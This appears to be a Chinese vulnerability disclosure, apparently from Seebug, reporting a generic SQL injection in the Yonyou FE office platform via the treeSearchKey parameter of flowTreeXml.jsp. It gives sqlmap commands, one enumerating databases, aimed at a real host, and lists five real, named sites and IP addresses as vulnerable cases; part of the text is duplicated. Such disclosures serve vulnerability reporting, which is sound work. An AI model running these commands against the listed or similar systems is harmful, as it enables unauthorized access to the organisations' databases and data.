### 简要描述: 用友FE办公平台通用SQL注入 ### 详细说明: 该连接存在SQL注入 /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" [<img src="https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg) sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs [<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg) 5个案例: http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1...
### 简要描述: 用友FE办公平台通用SQL注入 ### 详细说明: 该连接存在SQL注入 /permissionsreport/flowTreeXml.jsp?treeSearchKey=1 sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" [<img src="https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg) sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs [<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg) 5个案例: http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)
